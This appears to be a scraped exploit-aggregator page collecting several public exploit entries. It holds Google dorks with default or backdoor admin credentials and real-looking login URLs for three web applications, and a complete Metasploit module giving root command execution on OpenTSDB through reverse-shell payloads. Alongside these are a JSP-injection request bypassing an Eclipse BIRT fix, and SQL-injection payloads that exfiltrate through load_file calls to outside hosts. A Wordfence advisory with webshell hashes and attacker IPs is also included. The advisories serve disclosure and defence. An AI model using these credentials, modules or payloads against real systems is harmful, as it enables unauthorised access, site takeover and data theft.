Latest exploits :: CodePwn

<pre><code>==================================================================================================================================== | # Title : Car Dealer Pro v2.01 Backdoor Account Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit) | | # Vendor : https://codecanyon.net/item/car-dealer-pro/7265588 | | # Dork : "Powered by: Car Dealer Pro" | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use Payload : user=admin & pass=pass1234 [+] http://car.wenclub.vip/admin/ Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Botble 5.28.3 Backdoor Account Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit) | | # Vendor : hhttps://codecanyon.net/item/botble-cms-php-platform-based-on-laravel-framework/16928182 | | # Dork : "Botble Technologies. All right reserved." | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use Payload : user=botble & pass=159357 [+] https://cms.botble.com/admin/login Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Active ecommerce cms v6.4.0 Backdoor Account Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(64-bit) | | # Vendor : https://codecanyon.net/item/active-ecommerce-cms/23471405?s_rank=24 | | # Dork : "category/beauty-health-hair" | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use Payload : user=admin@example.com & pass=123456 [+] https://www.sbeshopping.com/login Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | | ======================================================================================================================================= </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'OpenTSDB 2.4.0 unauthenticated command injection', 'Description' => %q{ This module exploits an unauthenticated command injection vulnerability in the yrange parameter in OpenTSDB through 2.4.0 (CVE-2020-35476) in order to achieve unauthenticated remote code execution as the root user. The module first attempts to obtain the OpenTSDB version via the api. If the version is 2.4.0 or lower, the module performs additional checks to obtain the configured metrics and aggregators. It then randomly selects one metric and one aggregator and uses those to instruct the target server to plot a graph. As part of this request, the yrange parameter is set to the payload, which will then be executed by the target if the latter is vulnerable. This module has been successfully tested against OpenTSDB version 2.3.0. }, 'License' => MSF_LICENSE, 'Author' => [ 'Shai rod', # @nightrang3r - discovery and PoC 'Erik Wynter' # @wyntererik - Metasploit ], 'References' => [ ['CVE', '2020-35476'], ['URL', 'https://github.com/OpenTSDB/opentsdb/issues/2051'] # disclosure and PoC ], 'DefaultOptions' => { 'RPORT' => 4242 }, 'Platform' => %w[unix linux], 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'CmdStagerFlavor' => %w[bourne curl wget], 'Targets' => [ [ 'Automatic (Unix In-Memory)', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' }, 'Type' => :unix_memory } ], [ 'Automatic (Linux Dropper)', { 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }, 'Type' => :linux_dropper } ] ], 'Privileged' => true, 'DisclosureDate' => '2020-11-18', 'DefaultTarget' => 1, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('TARGETURI', [true, 'The base path to OpenTSDB', '/']), ] end def check # sanity check to see if the target is likely OpenTSDB res1 = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path) }) unless res1 return CheckCode::Unknown('Connection failed.') end unless res1.code == 200 && res1.get_html_document.xpath('//title').text.include?('OpenTSDB') return CheckCode::Safe('Target is not an OpenTSDB application.') end # get the version via the api res2 = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'api', 'version') }) unless res2 return CheckCode::Unknown('Connection failed.') end unless res2.code == 200 && res2.body.include?('version') return CheckCode::Detected('Target may be OpenTSDB but the version could not be determined.') end begin parsed_res_body = JSON.parse(res2.body) rescue JSON::ParserError return CheckCode::Detected('Could not determine the OpenTSDB version: the HTTP response body did not match the expected JSON format.') end unless parsed_res_body.is_a?(Hash) && parsed_res_body.key?('version') return CheckCode::Detected('Could not determine the OpenTSDB version: the HTTP response body did not match the expected JSON format.') end version = parsed_res_body['version'] begin if Rex::Version.new(version) <= Rex::Version.new('2.4.0') return CheckCode::Appears("The target is OpenTSDB version #{version}") else return CheckCode::Safe("The target is OpenTSDB version #{version}") end rescue ArgumentError => e return CheckCode::Unknown("Failed to obtain a valid OpenTSDB version: #{e}") end end def select_metric # check if any metrics have been configured. if not, exploitation cannot work res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'suggest'), 'vars_get' => { 'type' => 'metrics' } }) unless res fail_with(Failure::Unknown, 'Connection failed.') end unless res.code == 200 fail_with(Failure::UnexpectedReply, "Received unexpected status code #{res.code} when checking the configured metrics") end begin metrics = JSON.parse(res.body) rescue JSON::ParserError fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured metrics: The response body did not contain valid JSON.') end unless metrics.is_a?(Array) fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured metrics: The response body did not contain a JSON array') end if metrics.empty? fail_with(Failure::NoTarget, 'Failed to identify any configured metrics. This makes exploitation impossible') end # select a random metric since any will do @metric = metrics.sample print_status("Identified #{metrics.length} configured metrics. Using metric #{@metric}") end def select_aggregator # check the configured aggregators and select one at random res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'aggregators') }) unless res fail_with(Failure::Unknown, 'Connection failed.') end unless res.code == 200 fail_with(Failure::UnexpectedReply, "Received unexpected status code #{res.code} when checking the configured aggregators") end begin aggregators = JSON.parse(res.body) rescue JSON::ParserError fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured aggregators: The response body did not contain valid JSON.') end unless aggregators.is_a?(Array) fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured aggregators: The response body did not contain a JSON array') end if aggregators.empty? fail_with(Failure::NoTarget, 'Failed to identify any configured aggregators. This makes exploitation impossible') end # select a random aggregator since any will do @aggregator = aggregators.sample print_status("Identified #{aggregators.length} configured aggregators. Using aggregator #{@aggregator}") end def execute_command(cmd, _opts = {}) # use base64 to avoid special char escape hell (specifying BadChars did not help) cmd = "'echo #{Base64.strict_encode64(cmd)} | base64 -d | /bin/sh'" start_time = rand(20.year.ago..10.year.ago) # this should be a date far enough in the past to make sure we capture all possible data start_value = start_time.strftime('%Y/%m/%d-%H:%M:%S') end_time = rand(1.year.since..10.year.since) # this can be a date in the future to make sure we capture all possible data end_value = end_time.strftime('%Y/%m/%d-%H:%M:%S') get_vars = { 'start' => start_value, 'end' => end_value, 'm' => "#{@aggregator}:#{@metric}", 'yrange' => "[1:system(#{Rex::Text.uri_encode(cmd)})]", 'wxh' => "#{rand(800..1600)}x#{rand(400..600)}", 'style' => 'linespoint' } exploit_uri = '?' get_vars.each do |key, value| exploit_uri += "#{key}=#{value}&" end exploit_uri += 'json' # using a raw request because cgi was leading to encoding issues send_request_raw({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'q' + exploit_uri) }, 0) # we don't have to wait for a reply here end def exploit select_metric select_aggregator if target.arch.first == ARCH_CMD print_status('Executing the payload') execute_command(payload.encoded) else execute_cmdstager(background: true) end end end </code></pre>

<pre><code>Description: Unauthenticated Arbitrary File Upload Affected Plugin: Yith WooCommerce Gift Cards Premium Plugin Slug: yith-woocommerce-gift-cards-premium Affected Versions: <= 3.19.0 CVE ID: CVE-2022-45359 CVSS Score: 9.8 (Critical) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N Researcher/s: Dave Jong Fully Patched Version: 3.20.0 We were able to reverse engineer the exploit based on attack traffic and a copy of the vulnerable plugin and are providing information on its functionality as this vulnerability is already being exploited in the wild and a patch has been available for some time. The issue lies in the import_actions_from_settings_panel function which runs on the admin_init hook. Since admin_init runs for any page in the /wp-admin/ directory, it is possible to trigger functions that run on admin_init as an unauthenticated attacker by sending a request to /wp-admin/admin-post.php. Since the import_actions_from_settings_panel function also lacks a capability check and a CSRF check, it is trivial for an attacker to simply send a request containing a page parameter set to yith_woocommerce_gift_cards_panel, a ywgc_safe_submit_field parameter set to importing_gift_cards, and a payload in the file_import_csv file parameter. Since the function also does not perform any file type checks, any file type including executable PHP files can be uploaded. Cyber Observables These attacks may appear in your logs as unexpected POST requests to wp-admin/admin-post.php from unknown IP addresses. Additionally, we have observed the following payloads which may be useful in determining whether your site has been compromised. Note that we are providing normalized hashes (hashes of the file with all extraneous whitespace removed): kon.php/1tes.php – this file loads a copy of the “marijuana shell” file manager in memory from a remote location at shell[.]prinsh[.]com and has a normalized sha256 hash of 1a3babb9ac0a199289262b6acf680fb3185d432ed1e6b71f339074047078b28c b.php – this file is a simple uploader with a normalized sha256 hash of 3c2c9d07da5f40a22de1c32bc8088e941cea7215cbcd6e1e901c6a3f7a6f9f19 admin.php – this file is a password-protected backdoor and has a normalized sha256 hash of 8cc74f5fa8847ba70c8691eb5fdf8b6879593459cfd2d4773251388618cac90d Although we’ve seen attacks from more than a hundred IPs, the vast majority of attacks were from just two IP addresses: 103.138.108.15, which sent out 19604 attacks against 10936 different sites and 188.66.0.135, which sent 1220 attacks against 928 sites. The majority of attacks occurred the day after the vulnerability was disclosed, but have been ongoing, with another peak on December 14, 2022. As this vulnerability is trivial to exploit and provides full access to a vulnerable website we expect attacks to continue well into the future. Recommendations If you are running a vulnerable version of YITH WooCommerce Gift Cards Premium, that is, any version up to and including 3.19.0, we strongly recommend updating to the latest version available. While the Wordfence firewall does provide protection against malicious file uploads even for free users, attackers may still be able to cause nuisance issues by abusing the vulnerable functionality in less critical ways. If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both of these products include hands-on support in case you need further assistance. If you have any friends or colleagues who are using this plugin, please share this announcement with them and encourage them to update to the latest patched version of YITH WooCommerce Gift Cards Premium as soon as possible. If you are a security researcher, you can responsibly disclose your finds to us and obtain a CVE ID and get your name on the Wordfence Intelligence Community Edition leaderboard. </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20221216-0 > ======================================================================= title: Remote code execution - CVE-2021-34427 bypass product: Eclipse Business Intelligence Reporting Tool (BiRT) vulnerable version: <= 4.11.0 fixed version: 4.12 CVE number: CVE-2021-34427 impact: High homepage: https://eclipse.github.io/birt-website/ found: 2022-10-05 by: Armin Stock (Atos) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "With BIRT you can create data visualizations, dashboards and reports that can be embedded into web applications and rich clients. Make information out of your data!" https://eclipse.github.io/birt-website/ Business recommendation: ------------------------ The vendor provides a patch which should be installed immediately. Vulnerability overview/description: ----------------------------------- 1) Remote code execution - CVE-2021-34427 bypass The vulnerability described in CVE-2021-34427 (https://www.cvedetails.com/cve/CVE-2021-34427/) allows an attacker to execute code on the server, by creating a `.jsp` file with the `BiRT - WebViewerExample`. This was fixed with the following code: ------------------------------------------------------------------------------- // viewer/org.eclipse.birt.report.viewer/birt/WEB-INF/classes/org/eclipse/birt/report/context/ViewerAttributeBean.java#L1081 protected static void checkExtensionAllowedForRPTDocument(String rptDocumentName) throws ViewerException { int extIndex = rptDocumentName.lastIndexOf("."); String extension = null; boolean validExtension = true; if (extIndex > -1 && (extIndex + 1) < rptDocumentName.length()) { extension = rptDocumentName.substring(extIndex + 1); if (!disallowedExtensionsForRptDocument.isEmpty() && disallowedExtensionsForRptDocument.contains(extension)) { validExtension = false; } if (!allowedExtensionsForRptDocument.isEmpty() && !allowedExtensionsForRptDocument.contains(extension)) { validExtension = false; } if (!validExtension) { throw new ViewerException(BirtResources.getMessage( ResourceConstants.ERROR_INVALID_EXTENSION_FOR_DOCUMENT_PARAMETER, new String[] { extension })); } } } ------------------------------------------------------------------------------- This fix can be easily bypassed by adding `/.` to the filename which allows an attacker to execute arbitrary code. Proof of concept: ----------------- 1) Remote code execution - CVE-2021-34427 bypass The old exploit results in an error message: ------------------------------------------------------------------------------- GET /birt/document?__report=test.rptdesign&sample=<@urlencode_all><% out.println("OS: " + System.getProperty("os.name")); out.println("Current dir: " + getServletContext().getRealPath("/"));%><@/urlencode_all>&__document=<@urlencode>./test/info-new.jsp<@/urlencode> HTTP/1.1 Host: IP:18080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,de-DE;q=0.5,de;q=0.3 Accept-Encoding: gzip, deflate Connection: close Cookie: JSESSIONID=C2A5FE509AD277742111569F8656881A Upgrade-Insecure-Requests: 1 ------------------------------------------------------------------------------- Response: ------------------------------------------------------------------------------- HTTP/1.1 200 Set-Cookie: JSESSIONID=A1E37E7FEC80DFFF155CAF9F642ADEB7; Path=/birt; HttpOnly Content-Type: text/html;charset=utf-8 Date: Wed, 05 Oct 2022 06:14:54 GMT Connection: close Content-Length: 4644 <html> <head> <title>Error</title> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"/> </head> <body> <div id="birt_errorPage" style="color:red"> document.getElementById('error_detail').style.display = 'block'; }else { document.getElementById('error_icon').innerHTML = '+ '; document.getElementById('error_detail').style.display = 'none'; }" > + Invalid extension - "jsp" for the __document parameter. ------------------------------------------------------------------------------- But adding `/.` to the end of the filename creates the file on the server as before: ------------------------------------------------------------------------------- GET /birt/document?__report=test.rptdesign&sample=<@urlencode_all><% out.println("OS: " + System.getProperty("os.name")); out.println("Current dir: " + getServletContext().getRealPath("/"));%><@/urlencode_all>&__document=<@urlencode>./test/info-new.jsp/.<@/urlencode> HTTP/1.1 Host: IP:18080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,de-DE;q=0.5,de;q=0.3 Accept-Encoding: gzip, deflate Connection: close Cookie: JSESSIONID=C2A5FE509AD277742111569F8656881A Upgrade-Insecure-Requests: 1 ------------------------------------------------------------------------------- ------------------------------------------------------------------------------- HTTP/1.1 200 Set-Cookie: JSESSIONID=5CC070E6E07D94816BF67A162E7DD8D2; Path=/birt; HttpOnly Content-Type: text/html;charset=utf-8 Date: Wed, 05 Oct 2022 05:26:01 GMT Connection: close Content-Length: 283 <html><head><title>Complete</title><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"></head> <body style="background-color: #ECE9D8;"> <div style="font-size:10pt;"> The report document file has been generated successfully. </div></body></html> ------------------------------------------------------------------------------- This allows the execution of the provided `JSP` code, by calling `/birt/test/info-new.jsp`. Vulnerable / tested versions: ----------------------------- The following version has been tested, but all versions <= 4.11 are vulnerable. * 4.10.0 (2022-10-01) Vendor contact timeline: ------------------------ 2022-11-07: Vendor contacted via bugs.eclipse.org (https://bugs.eclipse.org/bugs/show_bug.cgi?id=580994) 2022-11-17: Vendor confirmed the bypass and is working on a fix. 2022-11-17: Vendor provided a fix. 2022-11-27: The fix was tested and could be bypassed again. 2022-11-27: Vendor acknowledged the bypass and provided a new fix. 2022-11-28: The fix was tested and we were not able to bypass it. 2022-11-30: Vendor releases patched version 4.12 2022-12-16: Public release of security advisory. Solution: --------- Update Eclipse BIRT to version 4.12 or newer from the vendor's website: https://projects.eclipse.org/projects/technology.birt/releases/4.12.0 Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Armin Stock / @2022 </code></pre>

<pre><code>## Title: Senayan Library Management System v9.2.2 a.k.a SLIMS 9 Multiple SQLi-Not sanitizing correctly cookie session. ## Author: nu11secur1ty ## Date: 12.20.2022 ## Vendor: https://slims.web.id/web/ ## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.2.2 ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.2/SQLi ## Description: The manual insertion `point 3, 4, and 5` appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\ azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.stupid.com\\dzd'))+' was submitted in the manual insertion `point 3`. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. After manual testing: The parameters class, collType and membershipType are vulnerable to SQLi attacks! The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can take information from all database columns of this system by using this vulnerability. Not sanitizing correctly cookie session. ## STATUS: HIGH Vulnerability [+] Payload: ```MySQL 00 --- Parameter: class (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: reportView=true&year=2002&class=bbbb'+(select load_file('\\\\ 716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.id\\nbq'))+''+(select load_file('\\\\1rtb9wq2997df8x4x2cdtmp4kvqoee255twjjb70.slims.web.id\\avg'))+'' RLIKE (SELECT (CASE WHEN (2920=2920) THEN 0x62626262+(select load_file(0x5c5c5c5c37313667623163666539676b6a61347a646a34357178783932303876776c6b636e30656e3662762e736c696d732e7765622e69645c5c6e6271))+''+(select load_file(0x5c5c5c5c3172746239777132393937646638783478326364746d70346b76716f656532353574776a6a6237302e736c696d732e7765622e69645c5c617667))+'' ELSE 0x28 END)) AND 'xMPZ'='xMPZ&membershipType=a''&collType=aaaa'+(select load_file('\\\\dctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id\\wtf'))+''+(select load_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id \\dzd'))+' --- 01 --- Parameter: collType (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: reportView=true&year=2002&class=bbbb'+(select load_file('\\\\ 716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.id\\nbq'))+''+(select load_file('\\\\1rtb9wq2997df8x4x2cdtmp4kvqoee255twjjb70.slims.web.id\\avg'))+'&membershipType=a''&collType=aaaa'+(select load_file('\\\\dctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id\\wtf'))+''+(select load_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id\\dzd'))+'' RLIKE (SELECT (CASE WHEN (2279=2279) THEN 0x61616161+(select load_file(0x5c5c5c5c646374697930687a69777a643478756a6671716366643375756c306b6f61633166703666743968792e736c696d732e7765622e69645c5c777466))+''+(select load_file(0x5c5c5c5c617a6469746d3536316837666b7533796a39397573386e653235387a77706b676e346575316f70642e736c696d732e7765622e69645c5c647a64))+'' ELSE 0x28 END)) AND 'MGZY'='MGZY --- 03 --- Parameter: membershipType (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: reportView=true&year=2002&class=bbbb'+(select load_file('\\\\ 716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.id\\nbq'))+''+(select load_file('\\\\1rtb9wq2997df8x4x2cdtmp4kvqoee255twjjb70.slims.web.id\\avg'))+'&membershipType=a''' RLIKE (SELECT (CASE WHEN (7628=7628) THEN 0x612727 ELSE 0x28 END)) AND 'ckmk'='ckmk&collType=aaaa'+(select load_file('\\\\ dctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id\\wtf'))+''+(select load_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id \\dzd'))+' --- ``` ## Reproduce: [href]( https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.2/SQLi ) ## Reference: [Using HTTP cookies]( https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies) ## Proof and Exploit: [href](https://streamable.com/1m0y6c) ## Time spent `00:35:00` ## Writing an exploit `00:15:00` </code></pre>